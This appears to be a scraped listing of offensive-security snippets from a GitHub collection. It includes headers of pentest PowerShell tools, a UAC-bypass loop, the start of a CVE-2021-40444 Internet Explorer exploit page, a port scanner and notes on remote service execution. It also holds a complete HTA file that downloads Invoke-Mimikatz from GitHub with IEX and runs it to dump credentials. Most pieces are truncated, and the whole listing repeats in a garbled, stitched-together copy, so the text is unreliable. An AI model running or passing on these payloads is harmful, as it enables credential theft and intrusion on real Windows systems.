dcgithub

## ReadEmails.ps1
<#
.SYNOPSIS
   Read Exchange Emails with PowerShell

   Author: @r00t-3xp10it
   Tested Under: Windows 10 (19043) x64 bits
   Required Dependencies: Outlook {native}
   Optional Dependencies: none
   PS cmdlet Dev version: v1.0.1

## cve202140444_ie.html
<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Expires" content="-1">
    <meta http-equiv="X-UA-Compatible" content="IE=11">
</head>
<body>
    <script>
        var exploit_cab = "[CAB file URL]";

## powershell_snippets.ps1
# Prevent this file from being executed
Exit

# Find AD username by display name
get-aduser -filter { name -like '*test*' } -properties name | select-object name, samaccountname

# Locate an RDS user session by username from a gateway
Get-RDUserSession | Where-Object { $_.UserName -like '*test*' } | Select-Object UserName, HostServer

# Locate a Citrix session by username from a delivery controller

## PingSweep.ps1
<#
.SYNOPSIS
   Enumerate active IP Address {Local Lan}

   Author: @r00t-3xp10it
   Tested Under: Windows 10 (19043) x64 bits
   Required Dependencies: Networkinformation.ping {native}
   Optional Dependencies: Test-NetConnection {native}
   PS cmdlet Dev version: v1.4.12

## CMSTPTrigger.ps1
<#
.SYNOPSIS
   CmdLet to loop UACBypassCMSTP.ps1 execution!

   Author: @r00t-3xp10it
   Tested Under: Windows 10 (19043) x64 bits
   Required Dependencies: UACBypassCMSTP.ps1 {auto}
   Optional Dependencies: none
   PS cmdlet Dev version: v1.1.5

## invokeMimikatz.hta
<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
        var c = "powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
        new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>

## Lnk-Sweeper.ps1
 <#
.SYNOPSIS
   Manage windows shortcut (.LNK) artifacts.

   Author: @r00t-3xp10it
   Tested Under: Windows 10 (19043) x64 bits
   Required Dependencies: none
   Optional Dependencies: lnk_parser_cmd.exe {auto-download}
   PS cmdlet Dev version: v3.4.18

## Winlogon_Startup.hta

<html>
<head>
<title>IT Tasks for Users</title>
<HTA:APPLICATION
  APPLICATIONNAME="IT Tasks for Users"
  ID="IT Tasks for Users"
  VERSION="1.0"/>

<STYLE></STYLE>

## Simple_Port_scanner.ps1
1..255 | % { $a = $_; 135,389,3389,445,5986 | % {"10.0.61.$a";echo ((new-object Net.Sockets.TcpClient).Connect("10.0.61.$a",$_)) "Port $_ is open!"} 2>$null}

## Authenticated Remote Code Execution Methods in Windows.txt
1. Service Control Manager (SCM)
This method is used by psexec and all of its clones to start the executable that psexec creates.
Result:
A command to be run on demand and/or boot as SYSTEM (or less privileged accounts, but why would you do that?).
Example:
step 1/2; a new service can be created:
sc REMOTECOMPUTERNAME create myservicename binPath= executableToRun start= auto
alternatively, an existing service can be reconfigured:
sc REMOTECOMPUTERNAME config existingservice binPath= executableToRun start= auto
step 2/2; executableToRun will run on the remote system on boot as SYSTEM, or when instructed by:
	<#
	.SYNOPSIS
	Read Exchange Emails with PowerShell

	Author: @r00t-3xp10it
	Tested Under: Windows 10 (19043) x64 bits
	Required Dependencies: Outlook {native}
	Optional Dependencies: none
	PS cmdlet Dev version: v1.0.1
	<!DOCTYPE html>
	<html>
	<head>
	<meta http-equiv="Expires" content="-1">
	<meta http-equiv="X-UA-Compatible" content="IE=11">
	</head>
	<body>
	<script>
	var exploit_cab = "[CAB file URL]";
	# Prevent this file from being executed
	Exit

	# Find AD username by display name
	get-aduser -filter { name -like 'test' } -properties name \| select-object name, samaccountname

	# Locate an RDS user session by username from a gateway
	Get-RDUserSession \| Where-Object { $_.UserName -like 'test' } \| Select-Object UserName, HostServer

	# Locate a Citrix session by username from a delivery controller
	<#
	.SYNOPSIS
	Enumerate active IP Address {Local Lan}

	Author: @r00t-3xp10it
	Tested Under: Windows 10 (19043) x64 bits
	Required Dependencies: Networkinformation.ping {native}
	Optional Dependencies: Test-NetConnection {native}
	PS cmdlet Dev version: v1.4.12
	<#
	.SYNOPSIS
	CmdLet to loop UACBypassCMSTP.ps1 execution!

	Author: @r00t-3xp10it
	Tested Under: Windows 10 (19043) x64 bits
	Required Dependencies: UACBypassCMSTP.ps1 {auto}
	Optional Dependencies: none
	PS cmdlet Dev version: v1.1.5
	<html>
	<head>
	<HTA:APPLICATION ID="HelloExample">
	<script language="jscript">
	var c = "powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
	new ActiveXObject('WScript.Shell').Run(c);
	</script>
	</head>
	<body>
	<script>self.close();</script>
	<#
	.SYNOPSIS
	Manage windows shortcut (.LNK) artifacts.

	Author: @r00t-3xp10it
	Tested Under: Windows 10 (19043) x64 bits
	Required Dependencies: none
	Optional Dependencies: lnk_parser_cmd.exe {auto-download}
	PS cmdlet Dev version: v3.4.18

	<html>
	<head>
	<title>IT Tasks for Users</title>
	<HTA:APPLICATION
	APPLICATIONNAME="IT Tasks for Users"
	ID="IT Tasks for Users"
	VERSION="1.0"/>

	<STYLE></STYLE>
	1. Service Control Manager (SCM)
	This method is used by psexec and all of its clones to start the executable that psexec creates.
	Result:
	A command to be run on demand and/or boot as SYSTEM (or less privileged accounts, but why would you do that?).
	Example:
	step 1/2; a new service can be created:
	sc REMOTECOMPUTERNAME create myservicename binPath= executableToRun start= auto
	alternatively, an existing service can be reconfigured:
	sc REMOTECOMPUTERNAME config existingservice binPath= executableToRun start= auto
	step 2/2; executableToRun will run on the remote system on boot as SYSTEM, or when instructed by: